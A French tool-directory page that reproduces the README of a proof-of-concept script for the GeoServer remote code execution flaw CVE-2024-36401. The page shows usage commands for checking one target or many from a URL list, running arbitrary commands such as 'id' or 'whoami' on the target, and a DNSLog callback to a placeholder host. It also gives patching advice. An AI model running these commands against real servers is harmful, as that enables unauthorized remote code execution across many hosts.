Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-36401_Geoserver_RCE_POC — Ce script est un outil de détection de type PoC (Proof of Concept) développé pour la vulnérabilité d'exécution de code à distance (CVE-2024-36401) dans GeoServer. Cette vulnérabilité permet à un attaquant d'exécuter des commandes arbitraires sur le serveur cible en construisant des requêtes spécifiques. | Kitploit
Outils/GitHubGitHub/amoy6228/cve-2024-36401_geoserver_rce_poc
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubamoy6228/cve-2024-36401_geoserver_rce_poc

CVE-2024-36401_Geoserver_RCE_POC

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
21il y a 1 anPas encore vérifié

À propos

Ce script est un outil de détection de type PoC (Proof of Concept) développé pour la vulnérabilité d'exécution de code à distance (CVE-2024-36401) dans GeoServer. Cette vulnérabilité permet à un attaquant d'exécuter des commandes arbitraires sur le serveur cible en construisant des requêtes spécifiques.

Partager

⚠️ Avertissement : Cet outil est destiné uniquement à la recherche en sécurité et aux tests autorisés légalement. Ne l'utilisez pas à des fins illégales. L'utilisateur assume l'entière responsabilité juridique.

Version du README : [English | 中文]

Description de la vulnérabilité

Ce script est un outil de détection PoC (Proof of Concept) développé pour la vulnérabilité d'exécution de code à distance (CVE-2024-36401) dans GeoServer. Cette vulnérabilité permet à un attaquant d'exécuter des commandes arbitraires sur le serveur cible en construisant des requêtes spécifiques.


Dépendances de l'environnement

Assurez-vous que votre environnement d'exécution dispose des dépendances suivantes :

  • Python 3.x
  • Bibliothèques tierces :
    • requests
    • lxml

Vous pouvez installer les dépendances nécessaires avec la commande suivante :

root@kitploit:~
pip install requests lxml

Instructions d'utilisation

Détection d'une cible unique

root@kitploit:~
python poc.py -u http://target.com -d dnslog.example.com

Ou spécifiez la commande à exécuter :

root@kitploit:~
python poc.py -u http://target.com -c "touch /tmp/vulntest"

Détection de plusieurs cibles

Préparez un fichier texte contenant plusieurs URL cibles (une par ligne) :

root@kitploit:~
python poc.py -uf targets.txt -d dnslog.example.com

Ou spécifiez une commande :

root@kitploit:~
python poc.py -uf targets.txt -c "id"

Instructions d'utilisation détaillées : Document d'utilisation détaillée


Description des paramètres

⚠️ Remarque : les paramètres -d et -c ne peuvent pas être utilisés simultanément.


Exemple de sortie

root@kitploit:~
[INFO] 爬取到3个有效的 Typenames,开始漏洞探测
[INFO] 目标: http://example.com
[INFO] 执行命令: whoami
[INFO] DNSLOG地址:

[INFO] 正在尝试 typeName: topp:states -> whoami
[+] 命令疑似成功执行!目标: http://example.com 命令: whoami

Caractéristiques du script

  • Correction du problème de validation de vulnérabilité dans le POC Nuclei dû aux Typenames codés en dur.
  • Récupération automatique de toutes les informations Typenames et test itératif des Typenames exploitables.
  • Prise en charge de l'exécution de commandes via le paramètre -c.
  • Prise en charge d'un fichier d'URL pour tester en masse la présence de la vulnérabilité.

Recommandations de sécurité

  • Mettez à jour GeoServer vers la dernière version officielle dès que possible.
  • Contrôlez l'accès aux instances GeoServer exposées sur Internet.
  • Configurez le pare-feu pour limiter les sources d'accès à l'interface /geoserver/wfs.

Contribution

Les contributions sous forme d'Issues ou de Pull Requests sont les bienvenues pour améliorer ce projet.


Licence

Ce projet est sous licence MIT. Vous pouvez librement le modifier, le distribuer et l'utiliser commercialement, à condition de conserver l'avis de droit d'auteur.

Télécharger l’outil
ParamètreDescription
-u, --urlAdresse de la cible unique
-uf, --url-fileChemin du fichier contenant plusieurs URL cibles
-d, --dnslogAdresse DNSLog
-c, --commandCommande à exécuter sur le système cible (ex : whoami, id, curl)